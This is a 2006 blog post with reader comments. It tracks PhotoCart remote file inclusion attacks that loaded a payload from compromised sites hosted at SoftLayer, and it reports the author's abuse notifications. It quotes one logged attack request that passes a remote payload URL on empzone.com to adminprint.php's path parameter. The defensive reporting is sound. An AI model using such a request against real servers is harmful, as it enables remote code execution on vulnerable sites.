Saturday, December 30, 2006

PhotoCart vulnerability claims another website

UPDATE: 12/31 and it appears Softlayer took the server on IP 208.101.16.120 offline at this time. The PhotoCart attackers apparently aren't aware of this yet because there is still an ongoing attack referencing empzone.com as I write this. At least it will do no harm to innocent sites at the moment. Thank You Softlayer for the prompt action.

The latest wave of PhotoCart vulnerability attacks just claimed a new website.

This time they claimed Husnaweb.com, someone's blog, as a victim.

I first notified the owner of Husnaweb and the data center Softlayer of the problem on 12/20. They promptly removed the file http://www.husnaweb.com/c.in from the server and the PhotoCart attacks stopped for a couple of days. Then the attacks started up again when the file showed up on the server again, so apparently Husnaweb was still vulnerable itself and being actively exploited.

I wrote back to the site owner and Softlayer again on 12/25 assuming they would deal with it eventually, being it was a holiday, and today noticed they appear to have simply given up on the blog as Husnaweb is gone and it's now a parked page on GoDaddy.

Today the attacks started up all over again using this page request:

"GET /PhotoCart/adminprint.php?path=http://empzone.com/c.ar?"
host empzone.com has address 208.101.16.120
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net

whois 208.101.16.120

OrgName: SoftLayer Technologies Inc.
OrgID: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

NetRange: 208.101.0.0 - 208.101.63.255
Looks like empzone.com will be their next victim, notifying data center Softlayer yet again that another Softlayer customer has been breached.

Anyone notice a trend here?

The other site I reported about, wnydir.com, was also a Softlayer customer.
host wnydir.com has address 208.101.16.120
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net
The reverse DNS on the sites all point to baserunner.net which says "Coming Soon", no contact information.

I must be getting slow in my old age, they're all on the same IP address, it would appear that the server has been compromised.

Ah well, this makes my next letter to Softlayer a little different now doesn't it?
at

5 comments:

  1. Anonymous12/31/2006 12:03 PM

    Yes, I have and I'm the owner of BaseRunner ...

    I will be in touch for more info in the near future ...

    ReplyDelete
  2. Anonymous12/31/2006 1:05 PM

    Well, I am going to block baserunner until this is fixed.

    deny from .baserunner.net

    + ip-range

    ReplyDelete
  3. Anonymous12/31/2006 1:07 PM

    Actually, its Baserunner that is initiating the critical action here.

    Softlayer is a datacenter and is helping us by responding to our request in this case.

    FWIW, I'm very pleased with softlayer's support as they are doing everything they can to fix this ASAP.

    But make no mistake, the expoits would have continued if we didn't request action on the server.

    ReplyDelete
  4. IncrediBILL12/31/2006 8:43 PM

    Both Softlayer and Baserunner were very responsive in this matter.

    After I figured out it was more than just a single account that was compromised, action was very swift.

    Thanks again to baserunner and Softlayer.

    Now, the fun part, shutting down the botnet that's mounting the attack.

    ReplyDelete
  5. Anonymous1/01/2007 6:05 AM

    Awesome ... great to hear.

    ReplyDelete